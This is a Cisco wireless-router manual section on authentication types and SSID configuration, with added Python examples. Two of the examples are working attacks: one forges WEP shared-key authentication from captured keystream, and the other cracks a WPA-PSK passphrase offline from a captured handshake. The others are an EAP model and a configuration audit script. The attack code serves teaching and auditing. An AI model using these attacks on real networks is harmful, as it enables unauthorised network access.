
Cisco Router 860, 880 Series User Manual


Authentication Types for Wireless Devices
Understanding Authentication Types
OL-15914-01
Both the unencrypted challenge and the encrypted challenge can be monitored, however. An intruder who captures the two can XOR them to recover the RC4 keystream that the access point's WEP key produces for that IV, reuse that keystream (with the same IV) to answer a later challenge, and authenticate without ever learning the key; the captured pairs also feed the statistical attacks that recover the WEP key itself. Because of this weakness, shared key authentication can be less secure than open authentication. Like open authentication, shared key authentication does not rely on a RADIUS server on your network.
    Figure 2 shows the authentication sequence between a device trying to authenticate and an access point 
    using shared key authentication. In this example the device’s WEP key matches the access point’s key, 
    so it can authenticate and communicate.
    Figure 2 Sequence for Shared Key Authentication
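The keystream exposure described above, as an added example that is not part of the Cisco manual. It models WEP's RC4 keystream and CRC-32 ICV in Python with a constructed 104-bit key; the function names are this example's own. An eavesdropper who captures the plaintext challenge and the client's encrypted response XORs them to recover the keystream for that IV, then reuses the same IV to answer a fresh challenge from the access point without ever learning the key:

```python
import os
import zlib


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """RC4 keystream; WEP seeds RC4 with the 24-bit IV followed by the shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(body: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(body).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, body: bytes) -> bytes:
    return xor(body + icv(body), rc4_keystream(iv + key, len(body) + 4))


def wep_decrypt(key: bytes, iv: bytes, frame: bytes):
    plain = xor(frame, rc4_keystream(iv + key, len(frame)))
    body, tag = plain[:-4], plain[-4:]
    return body if tag == icv(body) else None


# Access point side of shared key authentication (steps 2 and 4 of Figure 2).
def ap_issue_challenge() -> bytes:
    return os.urandom(128)          # 802.11 shared key challenge text is 128 octets


def ap_verify(key: bytes, iv: bytes, response: bytes, challenge: bytes) -> bool:
    return wep_decrypt(key, iv, response) == challenge


# Legitimate client: encrypts the challenge under the shared WEP key (step 3).
def client_respond(key: bytes, challenge: bytes):
    iv = os.urandom(3)
    return iv, wep_encrypt(key, iv, challenge)


# Attacker: needs only the two frames that went over the air, never the key.
def eavesdrop_keystream(challenge: bytes, response: bytes) -> bytes:
    return xor(challenge + icv(challenge), response)


def forge_response(keystream: bytes, challenge: bytes) -> bytes:
    return xor(challenge + icv(challenge), keystream)


def demo(key: bytes = bytes.fromhex("0123456789abcdef0123456789")):
    """Returns (legitimate accepted, forgery with captured IV accepted, forgery with other IV accepted)."""
    challenge = ap_issue_challenge()
    iv, response = client_respond(key, challenge)
    legit_ok = ap_verify(key, iv, response, challenge)

    keystream = eavesdrop_keystream(challenge, response)   # attacker still does not know `key`
    new_challenge = ap_issue_challenge()                    # the attacker's own authentication attempt
    forged = forge_response(keystream, new_challenge)
    forged_ok = ap_verify(key, iv, forged, new_challenge)   # same IV -> same keystream -> accepted
    other_iv = bytes(b ^ 0xFF for b in iv)
    wrong_iv_ok = ap_verify(key, other_iv, forged, new_challenge)
    return legit_ok, forged_ok, wrong_iv_ok


if __name__ == "__main__":
    print(demo())
```

The forgery succeeds only when the attacker replays the captured IV; WEP lets the sender choose the IV, so that is always possible. Open authentication gives the intruder nothing comparable to capture, which is why the manual rates it no worse than shared key.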
    EAP Authentication to the Network
    This authentication type provides the highest level of security for your wireless network. By using the 
    Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the 
    access point helps a wireless client device and the RADIUS server to perform mutual authentication and 
    derive a dynamic unicast WEP key. The RADIUS server sends the WEP key to the access point, which 
    uses it for all unicast data signals that it sends to or receives from the client. The access point also 
    encrypts its broadcast WEP key (entered in the access point’s WEP key slot 1) with the client’s unicast 
    key and sends it to the client. 
When you enable EAP on your access points and client devices, authentication to the network occurs in the sequence shown in Figure 3.
[Figure 2 (shared key authentication): Client device <-> Access point or bridge <-> Wired LAN / Server. 1. Authentication request; 2. Unencrypted challenge text; 3. Encrypted challenge text; 4. Authentication success.]
    						
    Figure 3 Sequence for EAP Authentication
    In Steps 1 through 9 in Figure 3, a wireless client device and a RADIUS server on the wired LAN use 
    802.1x and EAP to perform a mutual authentication through the access point. The RADIUS server sends 
    an authentication challenge to the client. The client uses a one-way encryption of the user-supplied 
    password to generate a response to the challenge and sends that response to the RADIUS server. Using 
    information from its user database, the RADIUS server creates its own response and compares that to 
    the response from the client. When the RADIUS server authenticates the client, the process repeats in 
    reverse, and the client authenticates the RADIUS server.
    When mutual authentication is complete, the RADIUS server and the client determine a WEP key that 
    is unique to the client and provides the client with the appropriate level of network access, thereby 
    approximating the level of security in a wired switched segment to an individual desktop. The client 
    loads this key and prepares to use it for the logon session. 
    During the logon session, the RADIUS server encrypts and sends the WEP key, called a session key, over 
    the wired LAN to the access point. The access point encrypts its broadcast key with the session key and 
    sends the encrypted broadcast key to the client, which uses the session key to decrypt it. The client and 
    access point activate WEP and use the session and broadcast WEP keys for all communications during 
    the remainder of the session.
    There is more than one type of EAP authentication, but the access point behaves the same way for each 
    type: it relays authentication messages from the wireless client device to the RADIUS server and from 
    the RADIUS server to the wireless client device. See the 
    “Assigning Authentication Types to an SSID” 
    section on page 9 for instructions on setting up EAP on the access point.
Note: If you use EAP authentication, you can select open or shared key authentication, but you don't have to. EAP authentication controls authentication both to your access point and to your network.
[Figure 3 (EAP authentication): Client device <-> Access point or bridge <-> Wired LAN <-> RADIUS Server. 1. Authentication request; 2. Identity request; 3. Username; 4. Authentication challenge; 5. Authentication response; 6. Authentication success; 7. Authentication challenge; 8. Authentication response; 9. Successful authentication. Messages 3 through 9 are relayed by the access point between the client and the server.]
    						
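The nine-step exchange of Figure 3, as an added example (not Cisco's code): a Python model in which the access point only relays opaque messages, the RADIUS server stores a one-way hash of the password, and both sides derive the dynamic unicast WEP key after mutual challenge-response. The HMAC-SHA256 challenge/response and key derivation are this example's own stand-ins for a real EAP method, not any specific EAP type; the user names, keys and the rogue server are assumptions for illustration:

```python
import hashlib
import hmac
import os


def pw_hash(password: str) -> bytes:
    """One-way hash of the user's password; the RADIUS user database stores this, never the password."""
    return hashlib.sha256(password.encode()).digest()


def prf(secret: bytes, label: bytes, *parts: bytes) -> bytes:
    """Keyed derivation for challenge responses and session keys (illustrative, not a real EAP method)."""
    return hmac.new(secret, label + b"".join(parts), hashlib.sha256).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class AccessPoint:
    """Relays EAP messages unchanged (steps 3 to 9); it learns only the session key the server hands it."""

    def __init__(self, broadcast_key: bytes):
        self.broadcast_key = broadcast_key       # WEP key slot 1, shared by every client
        self.unicast_key = None
        self.relayed = []                        # every frame that crossed the air or the wired LAN

    def relay(self, msg: bytes) -> bytes:
        self.relayed.append(msg)
        return msg

    def wrapped_broadcast_key(self) -> bytes:
        # Broadcast key encrypted under the client's unicast session key before it goes over the air.
        return xor(self.broadcast_key, prf(self.unicast_key, b"broadcast"))


class RadiusServer:
    def __init__(self, user_db: dict):
        self.user_db = user_db                   # username -> pw_hash(password)

    def verify_client(self, user: str, challenge: bytes, response: bytes) -> bool:
        if user not in self.user_db:
            return False
        return hmac.compare_digest(prf(self.user_db[user], b"client", challenge), response)

    def respond(self, user: str, challenge: bytes) -> bytes:
        return prf(self.user_db.get(user, bytes(32)), b"server", challenge)

    def session_key(self, user: str, c1: bytes, c2: bytes) -> bytes:
        return prf(self.user_db[user], b"session", c1, c2)[:13]   # 104-bit dynamic unicast WEP key


class RogueServer(RadiusServer):
    """Evil-twin RADIUS that accepts any client; the client's own challenge (step 7) is what defeats it."""

    def verify_client(self, user, challenge, response) -> bool:
        return True


class Client:
    def __init__(self, username: str, password: str):
        self.username, self.password = username, password
        self.secret = pw_hash(password)
        self.unicast_key = self.broadcast_key = None

    def respond(self, challenge: bytes) -> bytes:
        return prf(self.secret, b"client", challenge)

    def verify_server(self, challenge: bytes, response: bytes) -> bool:
        return hmac.compare_digest(prf(self.secret, b"server", challenge), response)

    def session_key(self, c1: bytes, c2: bytes) -> bytes:
        return prf(self.secret, b"session", c1, c2)[:13]


def eap_login(client: Client, ap: AccessPoint, server: RadiusServer) -> str:
    user = ap.relay(client.username.encode()).decode()   # steps 1-3: identity request, username
    c1 = ap.relay(os.urandom(16))                        # step 4: server's challenge to the client
    r1 = ap.relay(client.respond(c1))                    # step 5: answer derived from the password hash
    if not server.verify_client(user, c1, r1):
        return "reject"                                  # no key is ever sent to the access point
    c2 = ap.relay(os.urandom(16))                        # steps 6-7: client's challenge to the server
    r2 = ap.relay(server.respond(user, c2))              # step 8
    if not client.verify_server(c2, r2):
        return "rogue-server"                            # the client refuses a server without the hash
    ap.unicast_key = server.session_key(user, c1, c2)    # step 9: session key over the wired LAN
    client.unicast_key = client.session_key(c1, c2)
    wrapped = ap.relay(ap.wrapped_broadcast_key())
    client.broadcast_key = xor(wrapped, prf(client.unicast_key, b"broadcast"))
    return "success"


if __name__ == "__main__":
    db = {"alice": pw_hash("correct horse battery")}
    ap = AccessPoint(os.urandom(13))
    print(eap_login(Client("alice", "correct horse battery"), ap, RadiusServer(db)))
```

Two properties worth checking on the relayed frames: the password never crosses the access point in any form, and a server that cannot answer the client's challenge gets no session key installed even though it "accepted" the client.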
    MAC Address Authentication to the Network
    The access point relays the wireless client device’s MAC address to a RADIUS server on your network, 
    and the server checks the address against a list of allowed MAC addresses. Intruders can create 
    counterfeit MAC addresses, so MAC-based authentication is less secure than EAP authentication. 
    However, MAC-based authentication provides an alternate authentication method for client devices that 
    do not have EAP capability. See the 
    “Assigning Authentication Types to an SSID” section on page 9 for 
    instructions on enabling MAC-based authentication.
Tip: If you don't have a RADIUS server on your network, you can create a list of allowed MAC addresses on the access point's Advanced Security: MAC Address Authentication page. Devices with MAC addresses not on the list are not allowed to authenticate.
Tip: If MAC-authenticated clients on your wireless LAN roam frequently, you can enable a MAC authentication cache on your access points. MAC authentication caching reduces overhead because the access point authenticates devices in its MAC-address cache without sending the request to your authentication server. See the "Configuring MAC Authentication Caching" section on page 14 for instructions on enabling this feature.
    Figure 4 shows the authentication sequence for MAC-based authentication.
    Figure 4 Sequence for MAC-Based Authentication
[Figure 4 (MAC-based authentication): Client device <-> Access point or bridge <-> Wired LAN / Server. 1. Authentication request; 2. Authentication success; 3. Association request; 4. Association response (access point blocks traffic from client); 5. Authentication request to the server; 6. Success; 7. Access point or bridge unblocks traffic from client.]
    						
    Combining MAC-Based, EAP, and Open Authentication
    You can set up the access point to authenticate client devices using a combination of MAC-based and 
    EAP authentication. When you enable this feature, client devices that associate to the access point using 
    802.11 open authentication first attempt MAC authentication; if MAC authentication succeeds, the client 
    device joins the network. 
    If MAC authentication fails, EAP authentication takes place. See the “Assigning Authentication Types 
    to an SSID” section on page 9 for instructions on setting up this combination of authentications.
    Using CCKM for Authenticated Clients
    Using Cisco Centralized Key Management (CCKM), authenticated client devices can roam from one 
    access point to another without any perceptible delay during reassociation. An access point on your 
    network provides Wireless Domain Services (WDS) and creates a cache of security credentials for 
    CCKM-enabled client devices on the subnet. 
    The WDS access point’s cache of credentials dramatically reduces the time required for reassociation 
    when a CCKM-enabled client device roams to a new access point. When a client device roams, the WDS 
    access point forwards the client’s security credentials to the new access point, and the reassociation 
    process is reduced to a two-packet exchange between the roaming client and the new access point. 
    Roaming clients reassociate so quickly that there is no perceptible delay in voice or other time-sensitive 
    applications. See the 
    “Assigning Authentication Types to an SSID” section on page 9 for instructions on 
    enabling CCKM on your access point. The RADIUS-assigned VLAN feature is not supported for client 
    devices that associate using SSIDs with CCKM enabled. 
    Figure 5 shows the reassociation process using CCKM. 
    Figure 5 Client Reassociation Using CCKM
[Figure 5 (client reassociation using CCKM): Roaming client device <-> Access point <-> WDS device (router/switch/AP) <-> Authentication server (wired LAN). Reassociation request; Pre-registration request; Pre-registration reply; Reassociation response.]
    						
    Using WPA Key Management
    Wi-Fi Protected Access is a standards-based, interoperable security enhancement that strongly increases 
    the level of data protection and access control for existing and future wireless LAN systems. It is derived 
    from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA leverages TKIP 
    (Temporal Key Integrity Protocol) for data protection and 802.1X for authenticated key management.
    WPA key management supports two mutually exclusive management types: WPA and WPA-Pre-shared 
    key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each 
    other using an EAP authentication method, and the client and server generate a pairwise master key 
    (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using 
    WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that 
    pre-shared key is used as the PMK.
Note: The unicast and multicast cipher suites advertised in the WPA information element (and negotiated during 802.11 association) may not match the cipher suite supported in an explicitly assigned VLAN. If the RADIUS server assigns a new VLAN ID that uses a cipher suite different from the one previously negotiated, the access point and client cannot switch to the new cipher suite: WPA and CCKM do not allow the cipher suite to change after the initial 802.11 cipher negotiation. In this scenario the client device is disassociated from the wireless LAN.
    See the “Assigning Authentication Types to an SSID” section on page 9 for instructions on configuring 
    WPA key management on your access point. 
    Figure 6 shows the WPA key management process. 
    						
    Figure 6 WPA Key Management Process
Configuring Authentication Types
This section describes how to configure authentication types. You attach authentication types to SSIDs. See Service Set Identifier (SSID) for details on setting up multiple SSIDs. This section contains these topics:
• Assigning Authentication Types to an SSID, page 9
• Configuring Authentication Holdoffs, Timeouts, and Intervals, page 15
• Creating and Applying EAP Method Profiles for the 802.1X Supplicant, page 18
Note: There are no default authentication SSIDs for the wireless router.
[Figure 6 (WPA key management process): Client device <-> Access point <-> Authentication server (wired LAN).
1. Client and server authenticate to each other, generating an EAP master key.
2. The server uses the EAP master key to generate a pairwise master key (PMK) to protect communication between the client and the access point. (If both the access point and the client are configured with the same pre-shared key, the pre-shared key is used as the PMK and the server does not generate one.)
3. Client and access point complete a four-way handshake to: confirm that a PMK exists and that knowledge of the PMK is current; derive a pairwise transient key (PTK) from the PMK; install encryption and integrity keys into the encryption/integrity engine, if necessary; confirm installation of all keys.
4. Client and access point complete a two-way handshake to securely deliver the group transient key from the access point to the client.]
    						
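The WPA-PSK case of Figure 6 in working code, added here and not taken from the manual. It maps the passphrase to the PMK with the 802.11i PBKDF2 function, derives the PTK with PRF-512 from the two MAC addresses and the two nonces, checks the message 2 MIC the way the access point does ("knowledge of the PMK is current"), and then shows why the pre-shared key must be strong: everything an attacker needs to test passphrases offline is in the captured handshake. The MAC addresses, nonces, EAPOL frame body and wordlist are constructed; the SSID and passphrase are the ones from the migration-mode example later on this page.

```python
import hashlib
import hmac


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: the pre-shared key is the PMK; 802.11i derives it as PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]      # KCK (16) | KEK (16) | TK (16) | TKIP MIC keys (8 + 8)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA/TKIP EAPOL-Key MIC: HMAC-MD5 under the KCK over the frame with its MIC field zeroed."""
    return hmac.new(kck, frame, hashlib.md5).digest()


def four_way_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Messages 1 and 2 of the four-way handshake; returns (AP accepted msg2, what a sniffer saw)."""
    pmk = wpa_psk_pmk(passphrase, ssid)                       # already on both sides: no server involved
    ptk_client = derive_ptk(pmk, aa, spa, anonce, snonce)     # client derives after msg1 delivers ANonce
    msg2 = b"EAPOL-Key msg2 (constructed body):" + snonce     # SNonce travels in the clear
    mic2 = eapol_mic(ptk_client[:16], msg2)                   # proves PMK possession; no key material sent
    ptk_ap = derive_ptk(pmk, aa, spa, anonce, snonce)         # AP derives independently once it has SNonce
    ap_accepts = hmac.compare_digest(eapol_mic(ptk_ap[:16], msg2), mic2)
    capture = {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "msg2": msg2, "mic2": mic2}
    return ap_accepts, capture


def crack_psk(capture: dict, ssid: str, wordlist):
    """Offline guess: each candidate costs 4096 HMAC-SHA1 plus one PRF-512; no access point is contacted."""
    for candidate in wordlist:
        ptk = derive_ptk(wpa_psk_pmk(candidate, ssid), capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["msg2"]), capture["mic2"]):
            return candidate
    return None


if __name__ == "__main__":
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # constructed MAC addresses
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                   # constructed nonces
    ok, cap = four_way_handshake("batmobile65", "migrate", aa, spa, anonce, snonce)
    print(ok, crack_psk(cap, "migrate", ["password", "12345678", "batmobile65"]))
```

Because the SSID is the PBKDF2 salt, the 4096-iteration cost is the only thing slowing a guess; the MIC check in `crack_psk` is exactly the check the access point performs, so a short dictionary word in `wpa-psk ascii` is recoverable from one captured handshake. With WPA (not WPA-PSK) the PMK comes from the EAP exchange and is different per session, which is the property this attack lacks.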
Assigning Authentication Types to an SSID
To configure authentication types for SSIDs, follow these steps, beginning in privileged EXEC mode:

Step 1  configure terminal
        Enters global configuration mode.

Step 2  dot11 ssid ssid-string
        Creates an SSID and enters SSID configuration mode for the new SSID. The SSID can consist of up to 32 alphanumeric, case-sensitive characters.
        The first character cannot be one of the following:
        • Exclamation point (!)
        • Pound sign (#)
        • Semicolon (;)
        The following characters are invalid and cannot be used anywhere in an SSID:
        • Plus sign (+)
        • Right bracket (])
        • Forward slash (/)
        • Quotation mark (")
        • Tab
        • Trailing spaces
    						
Step 3  authentication open [mac-address list-name [alternate]] [[optional] eap list-name]
        (Optional) Sets the authentication type to open for this SSID. Open authentication allows any device to authenticate and then attempt to communicate with the access point.
        • (Optional) Set the SSID's authentication type to open with MAC address authentication. The access point forces all client devices to perform MAC-address authentication before they are allowed to join the network. For list-name, specify the authentication method list. For more information on method lists, see http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/fsecur_c/fsaaa/scfathen.htm#xtocid2
          Use the alternate keyword to allow client devices to join the network using either MAC or EAP authentication; clients that successfully complete either authentication are allowed to join the network.
        • (Optional) Set the SSID's authentication type to open with EAP authentication. The access point forces all client devices to perform EAP authentication before they are allowed to join the network. For list-name, specify the authentication method list.
          Use the optional keyword to allow client devices using either open or EAP authentication to associate and become authenticated. This setting is used mainly by service providers that require special client accessibility.
        Note: An access point configured for EAP authentication forces all client devices that associate to perform EAP authentication. Client devices that do not use EAP cannot use the access point.

Step 4  authentication shared [mac-address list-name] [eap list-name]
        (Optional) Sets the authentication type for the SSID to shared key.
        Note: Because of shared key's security flaws, Cisco recommends that you avoid using it.
        Note: You can assign shared key authentication to only one SSID.
        • (Optional) Set the SSID's authentication type to shared key with MAC address authentication. For list-name, specify the authentication method list.
        • (Optional) Set the SSID's authentication type to shared key with EAP authentication. For list-name, specify the authentication method list.
    						
Step 5  authentication network-eap list-name [mac-address list-name]
        (Optional) Sets the authentication type for the SSID to Network-EAP. Using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication and derive a dynamic unicast WEP key. However, the access point does not force all client devices to perform EAP authentication.
        • (Optional) Set the SSID's authentication type to Network-EAP with MAC address authentication. All client devices that associate to the access point are required to perform MAC-address authentication. For list-name, specify the authentication method list.

Step 6  authentication key-management {[wpa] [cckm]} [optional]
        (Optional) Sets the authentication type for the SSID to WPA, CCKM, or both. If you use the optional keyword, client devices other than WPA and CCKM clients can use this SSID. If you do not use the optional keyword, only WPA or CCKM client devices are allowed to use the SSID.
        To enable CCKM for an SSID, you must also enable Network-EAP authentication. When CCKM and Network-EAP are enabled for an SSID, client devices using LEAP, EAP-FAST, PEAP/GTC, MSPEAP, and EAP-TLS can authenticate using the SSID.
        To enable WPA for an SSID, you must also enable Open authentication or Network-EAP or both.
        Note: When you enable both WPA and CCKM for an SSID, you must enter wpa first and cckm second. Any WPA client can attempt to authenticate, but only CCKM voice clients can attempt to authenticate.
        Note: Before you can enable CCKM or WPA, you must set the encryption mode for the SSID's VLAN to one of the cipher suite options. To enable both CCKM and WPA, you must set the encryption mode to a cipher suite that includes TKIP. See Cipher Suites and WEP for instructions on configuring the VLAN encryption mode.
        Note: If you enable WPA for an SSID without a pre-shared key, the key management type is WPA. If you enable WPA with a pre-shared key, the key management type is WPA-PSK. See the "Configuring Additional WPA Settings" section on page 13 for instructions on configuring a pre-shared key.

Step 7  end
        Returns to privileged EXEC mode.

Step 8  copy running-config startup-config
        (Optional) Saves your entries in the configuration file.

Use the no form of the SSID commands to disable the SSID or to disable SSID features.
    						
This example sets the authentication type for the SSID batman to Network-EAP with CCKM authenticated key management. Client devices using the SSID batman authenticate using the adam server list. After they are authenticated, CCKM-enabled clients can perform fast reassociations using CCKM.

ap1200# configure terminal
ap1200(config)# dot11 ssid batman
ap1200(config-ssid)# authentication network-eap adam
ap1200(config-ssid)# authentication key-management cckm optional
ap1200(config-ssid)# exit
ap1200(config)# interface dot11radio 0
ap1200(config-if)# ssid batman
ap1200(config-if)# end
Configuring WPA Migration Mode
WPA migration mode allows these client device types to use the same SSID to associate to the access point:
• WPA clients capable of TKIP and authenticated key management
• 802.1X-2001 clients (such as legacy LEAP clients and clients using TLS) capable of authenticated key management but not TKIP
• Static-WEP clients not capable of TKIP or authenticated key management
If all three client types associate using the same SSID, the multicast cipher suite for the SSID must be WEP. If only the first two types of clients use the same SSID, the multicast key can be dynamic, but if the static-WEP clients use the SSID, the key must be static. To accommodate associated client devices, the access point can switch automatically between a static group key and a dynamic group key. To support all three types of clients on the same SSID, you must configure the static key in key slot 2 or 3. Because the group key is then a static WEP key, every client on the SSID, including the WPA clients, receives broadcast and multicast traffic at WEP strength; treat migration mode as a transitional setting and retire it once the static-WEP clients are gone.
To set up an SSID for WPA migration mode, configure these settings:
• WPA optional
• A cipher suite containing TKIP and 40-bit or 128-bit WEP
• A static WEP key in key slot 2 or 3
This example sets the SSID migrate for WPA migration mode:

ap1200# configure terminal
ap1200(config)# interface dot11radio 0
ap1200(config-if)# encryption mode ciphers tkip wep128
ap1200(config-if)# encryption key 3 size 128 12345678901234567890123456 transmit-key
ap1200(config-if)# exit
ap1200(config)# dot11 ssid migrate
ap1200(config-ssid)# authentication open
ap1200(config-ssid)# authentication network-eap adam
ap1200(config-ssid)# authentication key-management wpa optional
ap1200(config-ssid)# wpa-psk ascii batmobile65
ap1200(config-ssid)# exit
ap1200(config)# interface dot11radio 0
ap1200(config-if)# ssid migrate
ap1200(config-if)# end
    						
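An added audit script (not Cisco's tooling) that reads a running-config in the form this section configures and flags the settings the manual itself warns about: shared key authentication, open authentication with no MAC, EAP or key-management requirement, MAC-only authentication, the optional keyword that admits non-EAP or non-WPA/CCKM clients, WPA-PSK, and a static WEP key on a radio. The configuration text, SSID names and finding codes are constructed for the example; the `wpa-psk ascii 0` form mirrors how IOS shows an unencrypted passphrase in show running-config and is an assumption here.

```python
SAMPLE_CONFIG = """\
hostname ap1200
!
dot11 ssid batman
   authentication network-eap adam
   authentication key-management cckm optional
!
dot11 ssid migrate
   authentication open
   authentication network-eap adam
   authentication key-management wpa optional
   wpa-psk ascii 0 batmobile65
!
dot11 ssid provider
   authentication open optional eap adam
!
dot11 ssid guest
   authentication open
!
dot11 ssid kiosk
   authentication open mac-address maclist
!
dot11 ssid legacy
   authentication shared
!
interface Dot11Radio0
 encryption mode ciphers tkip wep128
 encryption key 3 size 128 12345678901234567890123456 transmit-key
 ssid batman
 ssid migrate
!
"""

DESCRIPTIONS = {
    "SHARED_KEY": "shared key authentication: the challenge/response exposes WEP keystream; Cisco says avoid it",
    "OPEN_NO_AUTH": "open authentication with no MAC, EAP or key-management requirement: any device can join",
    "MAC_ONLY": "MAC-address authentication only: MAC addresses can be counterfeited",
    "OPTIONAL_EAP": "open with optional EAP: clients that skip EAP can still associate",
    "OPTIONAL_KEYMGMT": "key-management optional: non-WPA/CCKM clients (for example static WEP) can use this SSID",
    "WPA_PSK": "WPA-PSK: one pre-shared key is the PMK for every client and is guessable offline if weak",
    "STATIC_WEP": "static WEP key configured on the radio with a WEP cipher in the suite",
}


def parse_blocks(config: str):
    """Return [(header, [child lines])]; top-level lines start a block, indented lines belong to it."""
    blocks, current = [], None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            current = None
            continue
        if not raw[0].isspace():
            current = (raw.strip(), [])
            blocks.append(current)
        elif current is not None:
            current[1].append(raw.strip())
    return blocks


def audit_ssid(name: str, lines: list) -> list:
    def first(prefix):
        return next((l for l in lines if l.startswith(prefix)), None)

    open_line = first("authentication open")
    keymgmt = first("authentication key-management")
    has_eap = first("authentication network-eap") is not None or (
        open_line is not None and " eap " in open_line + " ")
    found = []
    if first("authentication shared") is not None:
        found.append("SHARED_KEY")
    if open_line is not None and keymgmt is None and not has_eap:
        found.append("MAC_ONLY" if "mac-address" in open_line else "OPEN_NO_AUTH")
    if open_line is not None and " optional " in open_line + " ":
        found.append("OPTIONAL_EAP")
    if keymgmt is not None and keymgmt.split()[-1] == "optional":
        found.append("OPTIONAL_KEYMGMT")
    if first("wpa-psk") is not None:
        found.append("WPA_PSK")
    return [(name, code) for code in found]


def audit_radio(name: str, lines: list) -> list:
    mode = next((l for l in lines if l.startswith("encryption mode")), "")
    has_static_key = any(l.startswith("encryption key") for l in lines)
    return [(name, "STATIC_WEP")] if has_static_key and "wep" in mode else []


def audit(config: str) -> list:
    """Walk every dot11 ssid and Dot11Radio block and collect (target, finding-code) pairs."""
    findings = []
    for header, lines in parse_blocks(config):
        parts = header.split()
        if parts[:2] == ["dot11", "ssid"] and len(parts) > 2:
            findings += audit_ssid(parts[2], lines)
        elif parts[0] == "interface" and len(parts) > 1 and parts[1].lower().startswith("dot11radio"):
            findings += audit_radio(parts[1], lines)
    return findings


if __name__ == "__main__":
    for target, code in audit(SAMPLE_CONFIG):
        print(f"{target:12} {code:17} {DESCRIPTIONS[code]}")
```

Run it against the output of show running-config; an SSID that produces no findings is one using Network-EAP or open-with-EAP together with non-optional WPA or CCKM key management, which is the strongest combination this section can express.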